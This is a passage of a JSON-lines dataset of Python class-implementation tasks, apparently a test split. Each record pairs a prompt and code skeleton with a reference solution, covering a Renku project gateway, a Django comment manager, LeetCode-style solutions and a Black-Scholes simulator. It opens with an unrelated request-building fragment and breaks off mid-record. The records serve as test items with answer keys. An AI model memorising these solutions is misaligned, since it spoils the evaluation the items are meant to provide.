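                       ('flowType', 'workflow', 'EQUAL')])
print(json.dumps(payload, indent=2))

# Hypothetical send, mirroring the record's requests usage:
# res = requests.post(url=query_scheduler_url,
#                     headers=get_headers(HOST), data=json.dumps(payload))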
KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "class_docstring": "Gateway for project database operations.", "class_name": "ProjectGateway", "detected_licenses": ["Apache-2.0", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n <|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000488", "length_bytes": 1889, "license_type": "permissive", "methods": [{"docstring": "Get project metadata.", "name": "get_project", "signature": "def get_project(self) -> Project"}, {"docstring": "Update project metadata.", "name": "update_project", "signature": "def update_project(self, project: Project)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002754", "prompt": "Implement the Python class `ProjectGateway` described below.\n\nClass description:\nGateway for project database operations.\n\nMethod signatures and docstrings:\n- def get_project(self) -> Project: Get project metadata.\n- def update_project(self, project: Project): Update project metadata.", "prompted_full_text": "Implement the Python class `ProjectGateway` described below.\n\nClass description:\nGateway for project database operations.\n\nMethod signatures and docstrings:\n- def get_project(self) -> Project: Get project metadata.\n- def update_project(self, project: Project): Update project metadata.\n\n<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n <|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "revision_id": "449ec7bca1cc435e5a8ceb278e49a422b953bb09", "skeleton": "<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n <|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", 
"snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n", "source": "the_stack_v2_python_sparse", "source_path": "renku/core/metadata/gateway/project_gateway.py", "source_repo": "code-inflation/renku-python", "split": "test", "star_events_count": 0} {"blob_id": "af0bb29f4dc9d611f315eb7dc2da56779673a3f0", "bodies": ["content_type = ContentType.objects.get_for_model(instance.__class__)\nobj_id = instance.id\nqueryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\nreturn queryset", "content_type = ContentType.objects.get(model=instance)\nprint(content_type)\nuuid = uuid_generator()\nif parent_obj:\n parent_obj = parent_obj\ncomment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\nreturn comment_form"], "bodies_text": "<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "class_docstring": "ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.", "class_name": "CommentManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). 
vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000489", "length_bytes": 7695, "license_type": "permissive", "methods": [{"docstring": "to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.", "name": "filter_by_model", "signature": "def filter_by_model(self, instance)"}, {"docstring": "tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).", "name": "form_create_by_model", "signature": "def form_create_by_model(self, instance, object_id, user, content, parent_obj=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005456", "prompt": "Implement the Python class `CommentManager` described below.\n\nClass description:\nye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\n\nMethod signatures and docstrings:\n- def filter_by_model(self, instance): to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\n- def form_create_by_model(self, instance, object_id, user, content, parent_obj=None): tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).", "prompted_full_text": "Implement the Python class `CommentManager` described below.\n\nClass description:\nye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\n\nMethod signatures and docstrings:\n- def filter_by_model(self, instance): to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\n- def form_create_by_model(self, instance, object_id, user, content, parent_obj=None): tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). 
vase API content o bayad shabihe request begirm(validated_data.get('content')).\n\n<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "revision_id": "aef47922fdd6488550881ed9d42bf30a0d33a32a", "skeleton": "<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). 
vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n", "source": "the_stack_v2_python_sparse", "source_path": "src/comments/models.py", "source_repo": "m3h-D/Myinfoblog", "split": "test", "star_events_count": 0} {"blob_id": "6566b3e449e5d21a61522a3d9cc0267bc93c703a", "bodies": ["vowels = ['a', 'e', 'i', 'o', 'u']\ni = 0\nj = len(s) - 1\ns = list(s)\nwhile i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\nreturn ''.join(s)", "vowels = ['a', 'e', 'i', 'o', 'u']\ni = 0\nj = len(s) - 1\ns = list(s)\nwhile i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\nreturn ''.join(s)"], "bodies_text": "<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000490", "length_bytes": 1707, "license_type": "no_license", "methods": [{"docstring": ":type s: str :rtype: str", "name": "reverseVowels", "signature": "def reverseVowels(self, s)"}, {"docstring": ":type s: str :rtype: str", "name": "reverseVowels1", "signature": "def reverseVowels1(self, 
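The CommentManager record's docstrings are romanized Persian; the class docstring roughly says "we built a custom filter so a view or model property can more easily return the comments for a content_object". Mechanically it leans on Django's ContentType framework. A hedged sketch of the filter side — this assumes a configured Django project with a `Comment` model defining `content_type` (FK to ContentType), `object_id`, and `parent` fields, so it is not standalone-runnable:

from django.contrib.contenttypes.models import ContentType
from django.db import models


class CommentManager(models.Manager):
    """Fetch top-level comments attached to an arbitrary model instance."""

    def filter_by_instance(self, instance):
        # Resolve the concrete model class to its ContentType row, then
        # match rows pointing at this exact object; parent=None keeps
        # only top-level comments (replies hang off `parent`).
        content_type = ContentType.objects.get_for_model(instance.__class__)
        return super().get_queryset().filter(
            content_type=content_type,
            object_id=instance.id,
            parent=None,
        )

In a view this reads as `Comment.objects.filter_by_instance(post)`, which is the convenience the record's docstring describes.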
s)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseVowels(self, s): :type s: str :rtype: str\n- def reverseVowels1(self, s): :type s: str :rtype: str", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseVowels(self, s): :type s: str :rtype: str\n- def reverseVowels1(self, s): :type s: str :rtype: str\n\n<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "revision_id": "c55b0cfd2967a2221c27ed738e8de15034775945", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n", "source": "the_stack_v2_python_sparse", "source_path": "PycharmProjects/leetcode/UsingArray/ReverseVowelsOfaString.py", "source_repo": "crystal30/DataStructure", "split": "test", "star_events_count": 0} {"blob_id": "52c5e2c4087f40244dd3beac172b3d00beee0244", "bodies": ["self.queue = deque([])\ncount = Counter(nums)\nself.judge = {}\nfor num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False", "while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\nif self.queue:\n return self.queue[0]\nreturn -1", "if value not in self.judge:\n self.judge[value] = True\nelse:\n self.judge[value] = False\nself.queue.append(value)"], "bodies_text": 
"<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "FirstUnique", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000491", "length_bytes": 1725, "license_type": "no_license", "methods": [{"docstring": "count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True", "name": "__init__", "signature": "def __init__(self, nums: List[int])"}, {"docstring": "if not self.unique: return -1 for item in self.unique: return item", "name": "showFirstUnique", "signature": "def showFirstUnique(self) -> int"}, {"docstring": "if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True", "name": "add", "signature": "def add(self, value: int) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005562", "prompt": "Implement the Python class `FirstUnique` described below.\n\nClass description:\nImplement the FirstUnique class.\n\nMethod signatures and docstrings:\n- def __init__(self, nums: List[int]): count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\n- def showFirstUnique(self) -> int: if not self.unique: return -1 for item in self.unique: return item\n- def add(self, value: int) -> None: if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True", "prompted_full_text": "Implement the Python class `FirstUnique` described below.\n\nClass 
description:\nImplement the FirstUnique class.\n\nMethod signatures and docstrings:\n- def __init__(self, nums: List[int]): count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\n- def showFirstUnique(self) -> int: if not self.unique: return -1 for item in self.unique: return item\n- def add(self, value: int) -> None: if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\n\n<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "revision_id": "90fd00246707b23d60a5d13b5a89d5b5f64ad008", "skeleton": "<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FirstUnique:\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) 
self.other[value] = True\"\"\"\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n", "source": "the_stack_v2_python_sparse", "source_path": "python_solution/1429.py", "source_repo": "Dongzi-dq394/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "37df6ce18c4ba8d1992ec9b70dd9bffc2ee55246", "bodies": ["self.numberOfSimulations = numberOfSimulations\nself.T = T\nself.initialValue = initialValue\nself.sigma = sigma\nself.r = r\nnp.random.seed(seed)", "standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\nfirstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\ndef BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\nblackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\nreturn blackScholesRealizations", "standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\nfirstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\nblackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\nreturn blackScholesRealizations"], "bodies_text": "<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "class_docstring": "In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r", "class_name": "GenerateBlackScholes", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. 
We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the 